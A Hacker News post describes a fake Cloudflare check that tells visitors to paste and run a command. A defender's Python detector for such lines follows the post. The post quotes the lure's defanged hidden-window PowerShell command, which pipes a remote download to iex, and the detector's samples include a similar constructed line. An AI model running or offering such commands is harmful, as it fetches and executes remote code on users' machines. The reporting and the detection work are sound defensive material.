from Hacker News

Is this a new attack vector?

by archon810 on 4/29/25, 11:21 PM with 1 comments

  • by archon810 on 4/29/25, 11:21 PM

    Has this phishing/infection vector been exposed yet? I visited a website of some professor hosted at a university. I was presented with the following Cloudflare message I've never seen before (image in linked tweet).

    When I read the instructions, I had to do a double take. How many unsuspecting internet users would do this without thinking twice?

    Win+R (run prompt), Ctrl+V (paste), Enter (execute).

    What are we executing? This (I replaced . with [DOT]): powershell -w h "curl bronxy[DOT]cc/sign/in|iex"

    Threat actors often use the "iex" command for its ability to launch both local and remote payloads. I curled the URL, and for me, it showed a Teams exe from MS (VirusTotal here: https://virustotal.com/gui/url/fb9945173e557129d38ccdf204622...), but I wonder if the response switches to something malicious sometimes.
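
A defender-side check for the pattern described in the post, added here as an example and not part of the original post: it flags command lines (for instance from process-creation logs or the Run dialog's RunMRU registry history) that start PowerShell, fetch remote content and hand it to `iex`. The function names are hypothetical, and every sample line except the post's own defanged command is constructed.

```python
import re

SHELL = re.compile(r"(?i)\b(powershell|pwsh)(\.exe)?\b")
DOWNLOAD = re.compile(r"(?i)\b(curl|wget|iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring)\b")
EXECUTE = re.compile(r"(?i)\b(iex|invoke-expression)\b")

def hidden_window(cmd):
    """True if a -WindowStyle flag, in any abbreviated form such as -w,
    is followed by 'hidden' or a prefix of it such as 'h'."""
    tokens = cmd.lower().split()
    for flag, value in zip(tokens, tokens[1:]):
        name = flag.lstrip("-/")
        value = value.strip("\"'")
        if flag[0] in "-/" and name and "windowstyle".startswith(name):
            if value and "hidden".startswith(value):
                return True
    return False

def traits(cmd):
    """List the paste-and-run traits present in one PowerShell command line."""
    if not SHELL.search(cmd):
        return []
    found = []
    if hidden_window(cmd):
        found.append("hidden-window")
    if DOWNLOAD.search(cmd):
        found.append("download")
    if EXECUTE.search(cmd):
        found.append("in-memory-exec")
    return found

def is_suspicious(cmd):
    """Download plus in-memory execution is the core signal; a hidden window adds weight."""
    found = traits(cmd)
    return "download" in found and "in-memory-exec" in found

SAMPLES = [
    'powershell -w h "curl bronxy[DOT]cc/sign/in|iex"',  # from the post, defanged
    'powershell.exe -WindowStyle Hidden -c "iex (irm https://example.invalid/a)"',  # constructed
    'powershell -NoProfile -File C:\\Scripts\\backup.ps1',  # constructed, benign
    'curl https://example.invalid/file.zip -o file.zip',  # constructed, no PowerShell
]

if __name__ == "__main__":
    for line in SAMPLES:
        print("ALERT" if is_suspicious(line) else "ok   ", traits(line), line)
```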